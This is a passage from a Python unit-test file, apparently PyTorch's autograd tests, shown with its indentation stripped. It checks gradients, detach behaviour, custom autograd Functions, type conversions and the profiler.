a = torch.rand(10, 10, 10, requires_grad=True)
result, = torch.autograd.grad(a[3:5], a, v_expanded)
expected = torch.zeros(10, 10, 10)
expected[3:5] = v_expanded
self.assertEqual(result, expected)
# TODO: opinfo this or move to unbind's test suite
def test_unbind(self):
stacked = torch.randn(3, 10, 10, requires_grad=True)
x, y, z = stacked.unbind()
grad = torch.randn(3, 10, 10)
torch.autograd.backward([x, y, z], grad.unbind())
self.assertEqual(stacked.grad, grad)
# check that it works with only one gradient provided (#9977)
for i in range(3):
stacked = torch.randn(3, 10, 10, requires_grad=True)
outs = stacked.unbind()
gi = grad.unbind()[i]
g, = torch.autograd.grad(outs[i], stacked, gi)
g_expected = torch.stack([gi if j == i else torch.zeros_like(gi)
for j in range(3)], dim=0)
self.assertEqual(g, g_expected)
# TODO: opinfo this or move to fill's test suite
def test_fill(self):
root = torch.randn(4, 5, requires_grad=True)
def func(root):
x = root.clone()
x.fill_(2)
return x
gradcheck(func, [root])
gradgradcheck(func, [root])
def test_unused_output(self):
x = torch.randn(10, 10, requires_grad=True)
outputs = x.chunk(5)
o = outputs[2]
o = o * 4 + 2
o.sum().backward()
expected_grad = torch.zeros(10, 10)
expected_grad[4:6] = 4
self.assertEqual(x.grad, expected_grad)
with torch.no_grad():
x.grad.zero_()
grad_output = torch.randn(2, 10)
outputs = x.chunk(5)
outputs[0].backward(grad_output)
expected_grad = torch.zeros(10, 10)
expected_grad[:2] = grad_output
self.assertEqual(x.grad, expected_grad)
# TODO: opinfo this or move to the sparse test suite
def _test_sparse_gather(self, size_x, size_ind, dim):
x = torch.randn(size_x, requires_grad=True)
if len(size_ind) > 0 and len(size_x) > 0:
ind = torch.randint(x.size(dim), size_ind)
else:
ind = torch.zeros(size_ind, dtype=torch.int64)
out = torch.gather(x, dim, ind, sparse_grad=False)
grad = torch.rand_like(out)
out.backward(grad)
grad_dense = x.grad.clone()
x.grad = None
out = torch.gather(x, dim, ind, sparse_grad=True)
out.backward(grad)
self.assertEqual(grad_dense, x.grad.to_dense())
def test_sparse_gather_dim0(self):
self._test_sparse_gather((10, 10), (5, 10), 0)
def test_sparse_gather_dim1(self):
self._test_sparse_gather((10, 10, 5), (10, 5, 5), 1)
def test_sparse_gather_dim_neg(self):
self._test_sparse_gather((10, 10, 5), (10, 10, 2), -1)
def test_sparse_gather_ind_scalar(self):
self._test_sparse_gather((10,), (), 0)
def test_sparse_gather_x_scalar(self):
self._test_sparse_gather((), (2,), 0)
def test_sparse_gather_both_scalar(self):
self._test_sparse_gather((), (), 0)
def test_gc_in_destructor(self):
"""
Previously, if a Function destructor triggered a garbage collection,
the Variable's tp_dealloc handler would get called twice leading to a
segfault.
"""
class CollectOnDelete(Function):
def forward(self, x):
return x
def backward(self, grad_output):
return grad_output
def __del__(self):
gc.collect()
for _ in range(10):
CollectOnDelete().forward(torch.randn(1, requires_grad=True)).backward()
def test_naughty_autograd_function_attribute_access(self):
class Id(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, grad_x):
return grad_x
with self.assertWarnsRegex(DeprecationWarning, "should not be instantiated"):
f = Id()
# # After raising warning, should still return an instance
self.assertIsInstance(f, Id)
x = torch.zeros(1, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, "non-static forward method is deprecated"):
f(x)
t = Id.apply(x)
self.assertEqual(t.grad_fn.name(), "IdBackward")
# THPFunction is the base class of both grad_fn and autograd functions,
# which means that a lot of accessors on them may segfault. Test that we
# properly error in this case.
t = torch.ones(1, requires_grad=True)
t._backward_hooks = dict()
with self.assertRaisesRegex(RuntimeError, "Attribute '_register_hook_dict' is invalid"):
f._register_hook_dict(t)
with self.assertRaisesRegex(RuntimeError, "Attribute 'register_hook' is invalid"):
f.register_hook(lambda x, y: None)
with self.assertRaisesRegex(RuntimeError, "Attribute 'next_functions' is invalid"):
f.next_functions
with self.assertRaisesRegex(RuntimeError, "Attribute 'name' is invalid"):
f.name()
with self.assertRaisesRegex(RuntimeError, "underlying PyNode has already been deallocated"):
f.metadata
@unittest.expectedFailure
def test_naughty_anomaly_access(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, g):
return g
x = torch.zeros(1, requires_grad=True)
y = MyFunction.apply(x)
y.backward()
y.grad_fn.metadata
g = y.grad_fn
del y
g.metadata # this currently fails, but shouldn't
def test_naughty_autograd_function_stashing_ctx(self):
saved_ctx = []
class Id(Function):
@staticmethod
def forward(ctx, x):
ctx.save_for_backward(x)
return x
@staticmethod
def backward(ctx, grad_x):
saved_ctx.append(ctx)
return ctx.saved_tensors
p = torch.zeros(1, requires_grad=True)
loss = Id.apply(p)
loss.backward(retain_graph=True)
del loss
# At this point in time, it complains that the graph has been freed
# (which indeed true, although a somewhat indirect way of stating the
# problem).
self.assertRaises(RuntimeError, lambda: saved_ctx[0].saved_tensors)
def test_custom_autograd_repeated_grad_grad(self):
# This test failed the equality check in PR #22983; it's an interesting
# and different test case worth enshrining. mult1 is not testing
# anything that interesting, but mult2 is the interesting case.
def mult1(x):
return x.prod(dim=-1).prod(dim=-1)
class Mult(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
y = mult1(x)
ctx.save_for_backward(x, y)
return y
@staticmethod
def backward(ctx, grad_output):
x, y = ctx.saved_tensors
return (grad_output * y)[:, None, None] / x
mult2 = Mult.apply
def check_gradgrad_repeated(x, y):
gy, = torch.autograd.grad(y[0], x, create_graph=True)
ggy_1, = torch.autograd.grad(gy[0, 0, 0], x, retain_graph=True)
gy, = torch.autograd.grad(y[0], x, create_graph=True)
ggy_2, = torch.autograd.grad(gy[0, 0, 0], x, retain_graph=True)
self.assertEqual(ggy_1[0, 0, 1], ggy_2[0, 0, 1])
x = torch.ones(2, 4, 4).requires_grad_()
check_gradgrad_repeated(x, mult1(x))
check_gradgrad_repeated(x, mult2(x))
def test_custom_autograd_no_early_free(self):
# This test failed complaining that buffers had already been freed
# prior to #22983. Also pretty interesting test case.
class Double(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
y = x ** 2
ctx.save_for_backward(x, y)
return y
@staticmethod
def backward(ctx, grad_output):
x, _ = ctx.saved_tensors
return grad_output * 2 * x
# this is equivalent, but uses the output of .forward() in .backward()
class Double2(Double):
@staticmethod
def backward(ctx, grad_output):
x, y = ctx.saved_tensors
return grad_output * 2 * y / x
double = Double.apply
double2 = Double2.apply
x = torch.tensor(2).double().requires_grad_()
self.assertTrue(gradcheck(double, x))
self.assertTrue(gradgradcheck(double, x))
self.assertTrue(gradcheck(double2, x))
self.assertTrue(gradgradcheck(double2, x))
y = double(x)
torch.autograd.grad(y, x, create_graph=True)
torch.autograd.grad(y, x)
y = double2(x)
torch.autograd.grad(y, x, create_graph=True)
torch.autograd.grad(y, x) # should not error!
def test_detach(self):
x = torch.randn(10, 10, requires_grad=True)
y = x + 2
y = y.detach()
z = y * 4 + 2
self.assertFalse(y.requires_grad)
self.assertFalse(z.requires_grad)
x = torch.randn(10, 10, requires_grad=True)
y = x * 2
y = y.detach()
self.assertFalse(y.requires_grad)
self.assertIsNone(y.grad_fn)
z = x + y
z.sum().backward()
# This is an incorrect gradient, but we assume that's what the user
# wanted. detach() is an advanced option.
self.assertEqual(x.grad, torch.ones(10, 10))
# in-place detach
x = torch.randn(10, 10, requires_grad=True)
y = torch.randn(10, 10, requires_grad=True)
a = x * 2
(y + a).sum().backward(retain_graph=True)
a.detach_()
self.assertFalse(a.requires_grad)
(y + a).sum().backward() # this won't backprop to x
self.assertEqual(x.grad, torch.ones(10, 10) * 2)
self.assertEqual(y.grad, torch.ones(10, 10) * 2)
# in-place deatch on a view raises an exception
view = x.narrow(0, 1, 4)
self.assertRaisesRegex(RuntimeError, 'view', lambda: view.detach_())
def test_detach_base(self):
"detaching base does not detach view"
x = torch.randn(10, 10, requires_grad=True)
view = x.narrow(0, 1, 4)
x.detach_()
self.assertFalse(x.requires_grad)
self.assertTrue(view.requires_grad)
self.assertIsNotNone(view.grad_fn)
self.assertIs(view._base, x)
def _test_type_conversion_backward(self, t, ):
fvar = Variable(t(torch.randn(5, 5).float()), requires_grad=True)
fvar.double().sum().backward()
self.assertEqual(fvar.grad, torch.ones_like(fvar))
self.assertEqual(type(fvar.grad), type(fvar))
dvar = Variable(t(torch.randn(5, 5).double()), requires_grad=True)
dvar.float().sum().backward()
self.assertEqual(dvar.grad, torch.ones_like(dvar))
self.assertEqual(type(dvar.grad), type(dvar))
def test_type_conversions(self):
x = torch.randn(5, 5)
self.assertIsInstance(x.float(), torch.FloatTensor)
self.assertIsInstance(x.int(), torch.IntTensor)
if torch.cuda.is_available():
self.assertIsInstance(x.float().cuda(), torch.cuda.FloatTensor)
self.assertIsInstance(x.int().cuda(), torch.cuda.IntTensor)
self.assertIsInstance(x.int().cuda().cpu(), torch.IntTensor)
if torch.cuda.device_count() >= 2:
x2 = x.float().cuda(1)
self.assertIsInstance(x2, torch.cuda.FloatTensor)
self.assertIs(x2.get_device(), 1)
x2 = x.float().cuda()
self.assertIsInstance(x2, torch.cuda.FloatTensor)
self.assertIs(x2.get_device(), 0)
x2 = x2.cuda(1)
self.assertIsInstance(x2, torch.cuda.FloatTensor)
self.assertIs(x2.get_device(), 1)
y = Variable(torch.randn(5).cuda(1), requires_grad=True)
y.cpu().sum().backward()
self.assertIs(y.grad.get_device(), 1)
self.assertIs(y.long().get_device(), 1)
for t in [torch.DoubleTensor, torch.FloatTensor, torch.IntTensor, torch.ByteTensor]:
for y_var in (True, False):
y = torch.randint(5, (5, 5), dtype=t.dtype)
y = Variable(y) if y_var else y
self.assertIsInstance(x.type(t), t)
self.assertIsInstance(x.type_as(y), t)
# TODO: t.dtype should work
t_dtype = t().dtype
self.assertIsInstance(x.type(t_dtype), t)
self.assertIs(t_dtype, x.type(t_dtype).dtype)
self.assertEqual(y.data_ptr(), y.type(t).data_ptr())
if torch.cuda.is_available():
for x_cuda in (True, False):
for y_cuda in (True, False):
x_c = x.cuda() if x_cuda else x
y_c = y.cuda() if y_cuda else y
_, y_type = y_c.type().rsplit('.', 1)
y_typestr = ('torch.cuda.' if y_cuda else 'torch.') + y_type
self.assertEqual(y_c.type(), x_c.type(y_typestr).type())
self.assertIs(y_c.dtype, x_c.type(y_c.dtype).dtype)
self.assertEqual(y_c.data_ptr(), y_c.cuda().data_ptr() if y_cuda else y_c.data_ptr())
self._test_type_conversion_backward(lambda x: x)
if torch.cuda.is_available():
self._test_type_conversion_backward(lambda x: x.cuda())
if torch.cuda.device_count() >= 2:
# one of these has to be the non-default device
self._test_type_conversion_backward(lambda x: x.cuda(0))
self._test_type_conversion_backward(lambda x: x.cuda(1))
def test_isolated_node(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
a = x + y
b = torch.max(a, 1, True)[1].repeat(1, 5).double()
o = (b + a).sum()
o.backward()
def test_shape(self):
x = torch.randn(3, 4)
self.assertEqual(2, len(x.shape))
self.assertEqual(x.shape[0], 3)
self.assertEqual(x.shape[1], 4)
def test_numpy_requires_grad(self):
x = torch.randn(2, 2, requires_grad=True)
err_msg_outputs = r"Can't call numpy\(\) on Tensor that requires grad. Use tensor.detach\(\).numpy\(\) instead."
with self.assertRaisesRegex(RuntimeError, err_msg_outputs):
x.numpy()
with torch.no_grad():
x.numpy()
x = torch.randn(2, 2)
x.numpy()
with torch.no_grad():
x.numpy()
def test_return_leaf(self):
class Identity(Function):
@staticmethod
def forward(ctx, a, b):
return a, a + b
@staticmethod
def backward(ctx, grad_a, grad_b):
return grad_a + grad_b, grad_b
hook_called = [False]
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
q, p = Identity.apply(x, y)
# Make sure hooks only receive grad from usage of q, not x.
def hook(grad):
hook_called[0] = True
self.assertEqual(grad, torch.ones(5, 5))
q.register_hook(hook)
(q + p + x).sum().backward()
self.assertEqual(x.grad, torch.ones(5, 5) * 3)
self.assertEqual(y.grad, torch.ones(5, 5))
self.assertTrue(hook_called[0])
def test_return_leaf_inplace(self):
class Inplace(InplaceFunction):
@staticmethod
def forward(ctx, a, b):
ctx.mark_dirty(a)
return a.add_(b), b + 2
@staticmethod
def backward(ctx, grad_a, grad_b):
return grad_a, grad_a + grad_b
x = torch.randn(5, 5)
y = torch.randn(5, 5, requires_grad=True)
q, p = Inplace.apply(x, y)
self.assertIs(q, x)
self.assertIs(q.grad_fn.__class__, Inplace._backward_cls)
self.assertTrue(q.requires_grad)
q.sum().backward()
self.assertEqual(y.grad, torch.ones(5, 5))
def test_leaf_assignment(self):
x = torch.randn(5, 5)
y = torch.randn(5, requires_grad=True)
z = torch.randn(5, requires_grad=True)
x[0] = y
x[1] = 2 * z
self.assertTrue(x.requires_grad)
self.assertIsNot(x.grad_fn, None)
x.sum().backward()
self.assertEqual(y.grad, torch.ones(5))
self.assertEqual(z.grad, torch.ones(5) * 2)
def test_no_grad_assignment(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5)
with torch.no_grad():
x[0] = y
self.assertTrue(x.requires_grad)
self.assertIsNone(x.grad_fn)
def test_no_grad_modifies_version(self):
x = torch.randn(5, requires_grad=True)
y = torch.randn(5, requires_grad=True)
z = (x * y).sum()
with torch.no_grad():
x *= 2
self.assertRaisesRegex(RuntimeError, 'modified by an inplace operation',
lambda: z.backward())
def test_no_grad_input(self):
class MyFunction(Function):
@staticmethod
def forward(self, x):
return x
@staticmethod
def backward(self, grad_output):
return grad_output
x = torch.randn(5, requires_grad=True)
with torch.no_grad():
y = MyFunction.apply(x)
self.assertTrue(x.requires_grad)
self.assertIsNone(y.grad_fn)
def test_backward_copy(self):
# This tests checks backward engine for a very subtle bug that appreared
# in one of the initial versions of autograd. Gradients tensors were
# simply stored in lists while the function waited for all its gradients
# to be computed. However, sometimes an output was used multiple times,
# so the gradients needed to be summed. Engine used to keep a need_copy
# set of tensors that will need a clone upon next addition and removed
# them from the set as soon as the clone was performed. However, this
# could lead to incorrect results if the same gradient tensor was
# buffered in three places in the graph:
# 1. When accumulating gradients in one of these places it was cloned
# and removed from need_copy set.
# 2. When accumulating in second place, it wasn't in the need_copy set,
# so the gradients were simply accumulated in-place (which already
# modified the grad in 3rd place)
# 3. When accumulating in the third place, it wasn't in the need_copy set
# as well, so the incoming gradient was summed in-place, yielding
# incorrect results in all functions, except the first one.
x = torch.ones(5, 5, requires_grad=True)
y = torch.ones(5, 5, requires_grad=True)
# Simulate that we're in the middle of the graph
a = x + 2
b = y + 2
c = x + 2
# This op will just return grad_output two times in backward
add1 = a + b
add2 = add1 + c
# Simulate a long branch, so grad_output will get buffered.
for _ in range(4):
a = a * 2
b = b * 2
c = c * 2
branch = a + b + c
out = add2 + branch
# expected gradients are:
# for x: 34 (16 from final a, 16 from final c, 2 from add2)
# for y: 17 (16 from final b, 1 from add2)
grad_output = torch.ones(5, 5)
out.backward(grad_output)
self.assertEqual(x.grad, torch.ones(5, 5) * 34)
self.assertEqual(y.grad, torch.ones(5, 5) * 17)
def test_save_none_for_backward(self):
test_case = self
class MyFn(Function):
@staticmethod
def forward(ctx, input):
ctx.save_for_backward(None, input, None)
return input * input
@staticmethod
def backward(ctx, grad_output):
n1, input, n2 = ctx.saved_tensors
test_case.assertIsNone(n1)
test_case.assertIsNone(n2)
return 2 * input * grad_output
x = torch.randn(5, 5, requires_grad=True)
y = MyFn.apply(x)
y.sum().backward()
self.assertEqual(x.grad, 2 * x)
def test_too_many_grads(self):
class MyFn(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
def backward(ctx, grad_output):
return grad_output, None, None
x = torch.randn(5, 5, requires_grad=True)
y = MyFn.apply(x)
y.sum().backward()
self.assertEqual(x.grad, torch.ones_like(x))
def test_pickle(self):
x = torch.randn(10, 10, requires_grad=True)
y = torch.randn(10, 10, requires_grad=False)
def assert_strict_equal(var1, var2):
self.assertEqual(var1, var2)
self.assertEqual(var1.requires_grad, var2.requires_grad)
serialized = [pickle.dumps([x, y], protocol=p) for p in range(3)]
for dump in serialized:
xc, yc = pickle.loads(dump)
assert_strict_equal(xc, x)
assert_strict_equal(yc, y)
def test_dep_nograd(self):
class F1(Function):
@staticmethod
def forward(ctx, input):
out = torch.randn(input.size())
ctx.mark_non_differentiable(out)
return input, out
@staticmethod
def backward(ctx, grad_output, ignored):
return grad_output
class F2(Function):
@staticmethod
def forward(ctx, input, ignored):
return input
@staticmethod
def backward(ctx, grad_output):
return grad_output, None
x = torch.randn(5, requires_grad=True)
a, b = F1.apply(x)
b = b + 1 # separate F1 from F2 by another op
self.assertTrue(a.requires_grad)
self.assertFalse(b.requires_grad)
c = F2.apply(a, b)
c.backward(torch.ones(c.size()))
self.assertEqual(x.grad, torch.ones(x.size()))
def test_set_grad_enabled(self):
x = torch.tensor([1.], requires_grad=True)
with torch.set_grad_enabled(False):
y = x * 2
self.assertFalse(y.requires_grad)
with torch.set_grad_enabled(True):
y = x * 2
self.assertTrue(y.requires_grad)
with torch.set_grad_enabled(False):
torch.set_grad_enabled(True)
y = x * 2
self.assertTrue(y.requires_grad)
def test_simple_reentrant(self):
y_data = torch.randn(2, 2)
class Reenter(Function):
@staticmethod
def forward(ctx, x):
with torch.enable_grad():
ctx.x = Variable(x, requires_grad=True)
ctx.y = Variable(y_data, requires_grad=True)
ctx.output_var = ctx.x * ctx.y
return ctx.output_var.detach()
@staticmethod
def backward(ctx, grad_output):
with torch.enable_grad():
ctx.output_var.sum().backward()
return ctx.x.grad * grad_output
# Reentrant starts on CPU thread, finishs on GPU thread
x = torch.randn(2, 2, requires_grad=True)
out = Reenter.apply(x)
out.sum().backward()
self.assertEqual(x.grad, y_data)
def test_reentrant_child_error(self):
# Parent graph.
a = torch.rand(3, 3, requires_grad=True)
c = a * a
# Reentrant child graph.
b = torch.rand(3, 3, requires_grad=True)
e = b * b
f = TestAutograd.SimulateBackwardError.apply(e)
reentrant_root = f.sum()
class ReentrantFunc(Function):
@staticmethod
def forward(ctx, inp):
return inp.clone()
@staticmethod
def backward(ctx, grad):
# Reentrant backward in child will throw an error.
reentrant_root.backward()
return grad
d = ReentrantFunc.apply(c)
with self.assertRaisesRegex(Exception, 'Simulate error'):
d.sum().backward()
# TODO: Create OpInfos for these ops
def test_broadcast_tensors(self):
f_args_variable = (torch.randn(3, dtype=torch.double, requires_grad=True),
torch.randn(1, 2, 1, dtype=torch.double, requires_grad=True),
torch.randn(1, 1, dtype=torch.double, requires_grad=True),
torch.randn(5, 1, 1, dtype=torch.double, requires_grad=True))
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_broadcast_tensors", "broadcast",
lambda a, b, c, d: torch.broadcast_tensors(a, b, c, d),
True, f_args_variable, f_args_tensor)
def test_block_diag(self):
f_args_variable = (torch.randn(1, S, dtype=torch.double, requires_grad=True),
torch.randn(2, S, dtype=torch.double, requires_grad=True),
torch.randn(3, S, dtype=torch.double, requires_grad=True))
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_block_diag", "block_diag",
lambda a, b, c: torch.block_diag(a, b, c),
True, f_args_variable, f_args_tensor)
def test_cat(self):
f_args_variable = (torch.randn(1, S, S, dtype=torch.double, requires_grad=True),
torch.randn(2, S, S, dtype=torch.double, requires_grad=True),
torch.randn(3, S, S, dtype=torch.double, requires_grad=True),
0)
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_cat", "cat",
lambda a, b, c, dim: torch.cat((a, b, c), dim),
True, f_args_variable, f_args_tensor, check_forward_ad=True)
def test_cat_negdim_1(self):
f_args_variable = (torch.randn(S, S, 1, dtype=torch.double, requires_grad=True),
torch.randn(S, S, 2, dtype=torch.double, requires_grad=True),
torch.randn(S, S, 3, dtype=torch.double, requires_grad=True),
-1)
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_cat_negdim_1", "cat",
lambda a, b, c, dim: torch.cat((a, b, c), dim),
True, f_args_variable, f_args_tensor, check_forward_ad=True)
def test_cat_negdim_2(self):
f_args_variable = (torch.randn(S, 1, S, dtype=torch.double, requires_grad=True),
torch.randn(S, 2, S, dtype=torch.double, requires_grad=True),
torch.randn(S, 3, S, dtype=torch.double, requires_grad=True),
-2)
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_cat_negdim_2", "cat",
lambda a, b, c, dim: torch.cat((a, b, c), dim),
True, f_args_variable, f_args_tensor, check_forward_ad=True)
def test_cat_empty_legacy(self):
f_args_variable = (torch.randn(0, dtype=torch.double, requires_grad=True),
torch.randn(S, S, dtype=torch.double, requires_grad=True))
# gradgradcheck doesn't work, probably because legacy size tracking is wrong somewhere,
# hence False passed below, but gradcheck checked explicitly.
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_cat_empty_legacy", "cat",
lambda a, b: torch.cat((a, b)),
False, f_args_variable, f_args_tensor, check_forward_ad=True)
self.assertTrue(gradcheck(lambda a, b: torch.cat((a, b)), f_args_variable, eps=1e-6, atol=PRECISION))
def test_cat_empty(self):
f_args_variable = (torch.randn(0, S, dtype=torch.double, requires_grad=True),
torch.randn(S, S, dtype=torch.double, requires_grad=True))
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_cat_empty", "cat",
lambda a, b: torch.cat((a, b)),
True, f_args_variable, f_args_tensor, check_forward_ad=True)
def test_var_mean_differentiable(self):
dim = [2, 4]
keepdim = False
input1 = torch.randn(3, 4, 5, 6, 2, 3, requires_grad=True)
input2 = deepcopy(input1)
var1, mean1 = torch.var_mean(input1, dim=dim, keepdim=keepdim)
var2 = input2.var(dim=dim, keepdim=keepdim)
mean2 = input2.mean(dim=dim, keepdim=keepdim)
grad = torch.randn(3, 4, 6, 3, requires_grad=True)
r1 = var1 * var1 * mean1 * mean1
r2 = var2 * var2 * mean2 * mean2
self.assertTrue(torch.allclose(r1, r2, rtol=0.01, atol=0.0))
torch.autograd.backward(r1, grad)
torch.autograd.backward(r2, grad)
self.assertTrue(torch.allclose(input1.grad, input2.grad, rtol=0.01, atol=0.0))
@slowTest
@skipIfNoLapack
def test_lobpcg(self):
def func(k, A, largest=True, B=None):
X_shape = list(A.shape)
X_shape[-1] = k
X = torch.eye(A.size(-2), k, dtype=A.dtype, device=A.device)
if A.dim() > 2:
X = X.expand(X_shape)
D, U = torch.lobpcg(A=A, k=k, B=B, X=X)
# LOBPCG uses a random initial eigenspace approximation
# if parameter `X` is not provided.
# This may cause a non-deterministic behavior
# when it comes to the sign of an eigenvector
# (note if v is an eigenvector, so is -v),
# hence we eliminate this non-determinism
# by making sure that each column of U
# gets multiplied by the sign of its max (in absolute value) element.
# Also, gradcheck changes the content of the input by +/- eps (default to 1e-06)
# to compute the numerical gradient which can also cause the signs to flip.
_, idx = U.abs().max(-2, keepdim=True)
sign = U.gather(-2, idx).sign()
U = U * sign
return D, U
# TODO: review if this can be ported to OpInfos or moved to test_linalg.py
def run_symeig_test(k, sizes, largest=True):
A = torch.rand(*sizes).double()
A = A.matmul(A.transpose(-1, -2)) / 10
A.requires_grad_(True)
gradcheck(lambda A: func(k, A, largest), A, check_batched_grad=False)
# Custom gradient vectors for better stability due to some
# non-determinism in the lobpcg's forward.
# Note it is not required if symeig is in forward instead (tested).
D_grad = torch.rand(*A.shape[:-2], k) / 100
U_grad = torch.rand(*A.shape[:-1], k) / 100
gradgradcheck(lambda A: func(k, A, largest), A, [D_grad, U_grad], atol=1e-4, check_batched_grad=False)
# check whether A.grad is symmetric
A = A.detach().requires_grad_(True)
D, U = func(k, A, largest)
(D.sum() + U.sum()).backward()
self.assertEqual(A.grad, A.grad.transpose(-1, -2))
# the tests below take about 1-2 minutes to finish,
# but we want to be extra sure that the backward is correct.
for largest in [True, False]:
run_symeig_test(1, (6, 6), largest=largest)
run_symeig_test(1, (2, 6, 6), largest=largest)
run_symeig_test(1, (2, 2, 6, 6), largest=largest)
run_symeig_test(2, (6, 6), largest=largest)
run_symeig_test(2, (2, 6, 6), largest=largest)
run_symeig_test(2, (2, 2, 6, 6), largest=largest)
run_symeig_test(3, (9, 9), largest=largest)
run_symeig_test(3, (2, 9, 9), largest=largest)
run_symeig_test(3, (2, 2, 9, 9), largest=largest)
def test_variable_traverse(self):
def get_out_and_unrefed_cycle():
inp = torch.randn(10, requires_grad=True)
tmp = inp.view(10, 1)
out = tmp.view(10)
# Create a reference cycle that contains an
# intermediary Variable in the graph
my_list = []
my_list.append(tmp)
my_list.append(my_list)
return out
out = get_out_and_unrefed_cycle()
gc.collect()
# This will segfault if things have been erroneously released
out.backward(torch.randn(out.size()))
def test_maximum_and_minimum_subgradient(self):
def run_test(f, a, b, expected_a_grad, expected_b_grad):
a = torch.tensor(a, requires_grad=True)
b = torch.tensor(b, requires_grad=True)
z = f(a, b)
z.sum().backward()
self.assertEqual(a.grad, expected_a_grad)
self.assertEqual(b.grad, expected_b_grad)
run_test(torch.maximum, [0., 1., 2.], [1., 1., 1.], [0., 0.5, 1.], [1., 0.5, 0.])
run_test(torch.minimum, [0., 1., 2.], [1., 1., 1.], [1., 0.5, 0.], [0., 0.5, 1.])
# TODO: norm is deprecated, update these tests and port them to OpInfos
# or test_linalg.py
def test_norm_subgradient(self):
def run_test(input_size, norm_deg):
input = torch.zeros(*input_size, requires_grad=True)
input.norm(norm_deg).backward()
self.assertEqual(input.grad.abs().sum(), 0)
run_test((10,), 2)
run_test((10, 10), 2)
run_test((10,), 3)
run_test((10,), 1)
run_test((10,), 1.5)
run_test((10,), inf)
def test_norm_inf_subgradient(self):
def run_test(input, expected, dim=None):
x = torch.tensor(input, requires_grad=True)
out = x.norm(inf, dim=dim, keepdim=True)
out.backward(torch.ones(out.size()))
self.assertEqual(x.grad, expected)
run_test([0., 0., 0.], [0., 0., 0.])
run_test([1., 0., 1.], [0.5, 0., 0.5])
run_test([[1., 0., 1.], [0., 1., 1.]], [[0.25, 0., 0.25], [0., 0.25, 0.25]])
run_test([[1., 0., 1.], [0., 1., 0.]], [[0.5, 0., 0.5], [0., 1., 0.]], (1,))
run_test(torch.ones((2, 2, 2)), torch.full((2, 2, 2), 0.25), (0, 2))
# TODO: review porting these to OpInfo tests
def test_pow_zero_tensor_gradient(self):
def run_test(input_size, exponent):
input = torch.zeros(*input_size, requires_grad=True)
input.pow(exponent).sum().backward()
self.assertEqual(input.grad.abs().sum(), 0)
run_test((10,), torch.zeros(10))
run_test((10, 10), torch.zeros(10, 10))
run_test((10,), 0)
def test_pow_scalar_base(self):
a = torch.arange(1, 13, dtype=torch.double).view(3, 4).requires_grad_()
gradcheck(lambda a: torch.pow(2, a), (a,))
def test_sinc(self):
# The derivative of sinc(x) at x=0 has to be special cased.
# A naive computation will result in 0/0 -> NaN.
# We also need to be careful when we are very close to 0, as the
# derivative's denominator is squared, and there are some floats
# that are positive and whose squares are zero.
a = torch.tensor([0.0, torch.finfo(torch.double).tiny, 1.0],
dtype=torch.double,
requires_grad=True)
gradcheck(torch.sinc, a)
def test_igamma(self):
# 1e-3 offset to avoid zeros
# NOTE: derivative for s is not implemented
s = (torch.rand(100, dtype=torch.double) + 1e-3)
x = (torch.rand(100, dtype=torch.double) + 1e-3).requires_grad_()
gradcheck(torch.igamma, (s, x))
gradgradcheck(torch.igamma, (s, x))
def test_igammac(self):
# 1e-3 offset to avoid zeros in s
# NOTE: derivative for s is not implemented
s = (torch.rand(100, dtype=torch.double) + 1e-3)
x = (torch.rand(100, dtype=torch.double)).requires_grad_()
gradcheck(torch.igamma, (s, x))
gradgradcheck(torch.igamma, (s, x))
def test_profiler(self):
x = torch.randn(10, 10)
with profile(use_kineto=kineto_available()) as p:
self.assertTrue(torch.autograd._profiler_enabled())
y = x * 2 + 4
self.assertFalse(torch.autograd._profiler_enabled())
names = ['aten::mul', 'aten::add']
found_indices = set()
for evt in p.function_events:
if evt.name in names:
found_indices.add(names.index(evt.name))
self.assertEquals(len(found_indices), len(names))
def test_profiler_seq_nr(self):
with profile(use_kineto=kineto_available()) as p:
x = torch.randn(10, 10, requires_grad=True)
y = torch.randn(10, 10, requires_grad=True)
z = x + y
s = z.sum()
s.backward()
print(p.key_averages().table(
sort_by="self_cpu_time_total", row_limit=-1))
# expecting aten::add, aten::sum to have the sequence numbers,
# expecting the corresponding backward nodes to have the same numbers
# as the forward ops
add_seq_nr = -1
sum_seq_nr = -1
found_add = found_sum = False
found_bwd_add = found_bwd_sum = False
found_empty = False
for e in p.function_events:
if e.name == "aten::add":
add_seq_nr = e.sequence_nr
self.assertFalse(found_add)
found_add = True
elif e.name == "aten::sum":
sum_seq_nr = e.sequence_nr
self.assertFalse(found_sum)
found_sum = True
elif "Add" in e.name and "Backward" in e.name:
self.assertEqual(e.sequence_nr, add_seq_nr)
self.assertFalse(found_bwd_add)
found_bwd_add = True
elif "Sum" in e.name and "Backward" in e.name:
self.assertEqual(e.sequence_nr, sum_seq_nr)
self.assertFalse(found_bwd_sum)
found_bwd_sum = True
# check that nested ops (e.g. empty) don't have
# sequence number
if e.name == "aten::empty":
self.assertEqual(e.sequence_nr, -1)
found_empty = True
self.assertGreaterEqual(add_seq_nr, 0)
self.assertGreaterEqual(sum_seq_nr, 0)
self.assertNotEqual(add_seq_nr, sum_seq_nr)
self.assertTrue(found_add)
self.assertTrue(found_sum)
self.assertTrue(found_bwd_add)
self.assertTrue(found_bwd_sum)
self.assertTrue(found_empty)
def test_profiler_unboxed_only(self):
x = torch.rand(3, 4)
with torch.autograd.profiler.profile(use_kineto=kineto_available()) as prof:
x.resize_([3, 2])
def test_profiler_propagation(self):
def foo(x):
with record_function("in_foo") as rf:
return x * 2
x = torch.rand(3, 4)
